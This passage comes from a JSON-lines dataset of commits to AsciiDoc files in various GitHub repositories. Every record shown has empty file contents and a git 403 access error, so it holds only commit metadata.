2018-03-12-P-H-Per-Golang.adoc","message":"Update 2018-03-12-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e6826b1ff65058aef2bcbacd66de0b47e7f9520","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6a924edf95feabb9962f214ddb9943923b6fcb","subject":"README","message":"README\n","repos":"motemen\/lib-src","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/motemen\/lib-src.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"435f5c76395144780b9ef90b01ebeb67965bfd17","subject":"y2b create post Don't Try This At Home...","message":"y2b create post Don't Try This At Home...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-07-Dont-Try-This-At-Home.adoc","new_file":"_posts\/2016-06-07-Dont-Try-This-At-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d90aecd9bd82ada4e76410954fd4d5b4c400ee9","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/10\/14\/deref.adoc","new_file":"content\/news\/2021\/10\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0e3a2dade823e54c8b5618d9dfc7d7dbe41ed58b","subject":"Update 2015-01-31-H24.adoc","message":"Update 2015-01-31-H24.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-01-31-H24.adoc","new_file":"_posts\/2015-01-31-H24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba8b06d8b60725288bc739e4889623ce74f2c58f","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a8ffc3da82d3969946865465436f84adcd56b1","subject":"small update","message":"small update\n","repos":"apiman\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman-guides,apiman\/apiman,msavy\/apiman,apiman\/apiman,apiman\/apiman-guides,msavy\/apiman,msavy\/apiman,ssogabe\/apiman-guides,msavy\/apiman,apiman\/apiman","old_file":"developer-guide\/en-US\/Plugins.asciidoc","new_file":"developer-guide\/en-US\/Plugins.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4367955f3060100d68f3a418615cfaa719dc51c4","subject":"Update 2017-01-28-Markov.adoc","message":"Update 2017-01-28-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Markov.adoc","new_file":"_posts\/2017-01-28-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"789c723bdfc7d303c395f3f55986a889eb4b91fe","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cd9e6792b6e634020d37b9ff3b838f503e18954","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07a8e8f6d10c7d1d53163aae17604d85cd4d0939","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e7c6102007f587a19f60e219d21355cbbd82c9c","subject":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","message":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69904ee8aa58b1108c809656ed34797a2eee0dd6","subject":"Explain that IDEA import honors IDEA configuration","message":"Explain that IDEA import honors IDEA configuration\n\nClarify that IDEA's import facility doesn't require the build script to apply\nthe IDEA Plugin, but it will honor some forms of IDEA configuration if it does.\n","repos":"lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/ideaPlugin.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/ideaPlugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5100d7d57a1fa73da3b4fddfe1984a30cf725014","subject":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","message":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c300ed4bba4732df53adb67931a5538ed167beb","subject":"y2b create post World's Biggest Android Phone!","message":"y2b create post World's Biggest Android Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-08-Worlds-Biggest-Android-Phone.adoc","new_file":"_posts\/2016-08-08-Worlds-Biggest-Android-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5258fb5ab9f331e164d992798b3f96eceda9413","subject":"Update 2016-08-27-Bretonio-Groks-Project-Pages.adoc","message":"Update 2016-08-27-Bretonio-Groks-Project-Pages.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-27-Bretonio-Groks-Project-Pages.adoc","new_file":"_posts\/2016-08-27-Bretonio-Groks-Project-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44eee02fabcfb708b06c2222ad708ffc3a33d471","subject":"Update 2016-08-31-Prueba-de-post-n3.adoc","message":"Update 2016-08-31-Prueba-de-post-n3.adoc","repos":"mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io","old_file":"_posts\/2016-08-31-Prueba-de-post-n3.adoc","new_file":"_posts\/2016-08-31-Prueba-de-post-n3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mager19\/mager19.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"583d059c0bfc79ca28e523dcca83d1e5d0470979","subject":"Update 2016-06-01-Dapeng-VR-Crisis.adoc","message":"Update 2016-06-01-Dapeng-VR-Crisis.adoc","repos":"blackgun\/blackgun.github.io,blackgun\/blackgun.github.io,blackgun\/blackgun.github.io","old_file":"_posts\/2016-06-01-Dapeng-VR-Crisis.adoc","new_file":"_posts\/2016-06-01-Dapeng-VR-Crisis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackgun\/blackgun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0f549fbbe6fbc73db4a8782a31d4352c57d612d","subject":"Update 2017-03-15-What-init-system-am-I-using-Something-test.adoc","message":"Update 2017-03-15-What-init-system-am-I-using-Something-test.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-What-init-system-am-I-using-Something-test.adoc","new_file":"_posts\/2017-03-15-What-init-system-am-I-using-Something-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"785e143b7e82479f66d8a90a6ef12fc187d00888","subject":"Update 2016-04-16-Certificacion-java.adoc","message":"Update 2016-04-16-Certificacion-java.adoc","repos":"crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io","old_file":"_posts\/2016-04-16-Certificacion-java.adoc","new_file":"_posts\/2016-04-16-Certificacion-java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crimarde\/crimarde.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fca0ce2533a4272304ec1614db6a676ac9518d6","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ef075e87892844a982e021b37617e94008d9af","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1291e41862f3c638f5c226d67e45d9b6601cf5ff","subject":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","message":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","repos":"luiz158\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs","old_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8c6e0a8a8d8eebccb6cadd2e9c740309e8283b05","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b09c276aae0e492a51a6bd0593df3b0380196695","subject":"Update 2016-07-16-Test-Post.adoc","message":"Update 2016-07-16-Test-Post.adoc","repos":"holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io","old_file":"_posts\/2016-07-16-Test-Post.adoc","new_file":"_posts\/2016-07-16-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/holtalanm\/holtalanm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f95c5ffe8764567822812ffd441cb92ef0e0c6","subject":"recomitting travis","message":"recomitting travis\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-18-Travis_CI.adoc","new_file":"_posts\/2017-08-18-Travis_CI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47d2ba22e8b142c013f4409abb4e79e3fe5bd0c8","subject":"Update 2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b4decfb017da160c59315937238c6792d87d539","subject":"Add instructions about how to write new recipes","message":"Add instructions about how to write new recipes\n","repos":"melix\/gradle-buildscan-recipes","old_file":"src\/recipes\/README.adoc","new_file":"src\/recipes\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/melix\/gradle-buildscan-recipes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4886627f792dd26d2bd01267776b035dd1cc117","subject":"add index.html","message":"add index.html\n","repos":"kmisztal\/JImageStream","old_file":"jis-documentation\/src\/index.adoc","new_file":"jis-documentation\/src\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kmisztal\/JImageStream.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5013a4636478b22f0372ce56fa69e95ec0f7f2b7","subject":"add info","message":"add info\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/config\/apoc.log.info.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/config\/apoc.log.info.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75e96c8ec916ad7f6bd4359c952afc99d4b90062","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa8159d9575c5f09d8e83cc69a7fd6911ecc01b7","subject":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","message":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10d74a736d4de2ef4640efb9d64adfd98f4b3b60","subject":"Helpful back-end development tips","message":"Helpful back-end development tips\n","repos":"kcrimson\/asciidoctor-reveal.js,kcrimson\/asciidoctor-reveal.js","old_file":"HACKING.adoc","new_file":"HACKING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kcrimson\/asciidoctor-reveal.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49601932ac0ff5df767a8b6a5a2c5056804e12a7","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b872e47d0e5d4561be94850e6be90d23b4ae241","subject":"Create aws-standalone.adoc","message":"Create aws-standalone.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-standalone.adoc","new_file":"userguide\/tutorials\/aws-standalone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2bad57aa104d4a3a4b1bd350c9c93a00d288048","subject":"Update 2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","message":"Update 2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","new_file":"_posts\/2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45fdebc8b60319b6b6ce19dd6a1fc124003607d1","subject":"y2b create post You've Never Seen A Mouse Do This...","message":"y2b create post You've Never Seen A Mouse Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-13-You've%20Never%20Seen%20A%20Mouse%20Do%20This....adoc","new_file":"_posts\/2017-12-13-You've%20Never%20Seen%20A%20Mouse%20Do%20This....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5b6654f6edc015ff72d1d3b1ae844595f9289c6","subject":"Create BuildingLinux.adoc","message":"Create BuildingLinux.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/BuildingLinux.adoc","new_file":"wiki\/BuildingLinux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"859ba8f0cb4cbd4fa9722a9f74b7f2a55faaf1c9","subject":"Update 2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","message":"Update 2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","new_file":"_posts\/2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7245e602f22de83fc5e1b6c489fbf0685740700","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faac0d844da4ed21ef8e755145338f013beb43b7","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a434c5c5433785e021ee38c0ee71dc2ca7a6b1","subject":"\u7ffb\u8bd1 running-tests","message":"\u7ffb\u8bd1 running-tests","repos":"iresty\/programming-openresty-zh","old_file":"testing\/running-tests.adoc","new_file":"testing\/running-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iresty\/programming-openresty-zh.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b74b99ff703bb389742bc42a03c3d4450aaef5ab","subject":"Update 2015-06-19-Command-driven-task-execution.adoc","message":"Update 2015-06-19-Command-driven-task-execution.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-06-19-Command-driven-task-execution.adoc","new_file":"_posts\/2015-06-19-Command-driven-task-execution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c67431714a32fd13aa4ba0a9176a6a35eef3e3ed","subject":"Update 2018-06-04-php-Documentor.adoc","message":"Update 2018-06-04-php-Documentor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-04-php-Documentor.adoc","new_file":"_posts\/2018-06-04-php-Documentor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38293abbb59cfa9e248b98438cc0aff43d4636de","subject":"domain docs evolved","message":"domain docs evolved\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2010165a9d6ff2cc8ed6e2bafdd372f94695a68e","subject":"Update 2016-05-04-Hello-my-hubpress.adoc","message":"Update 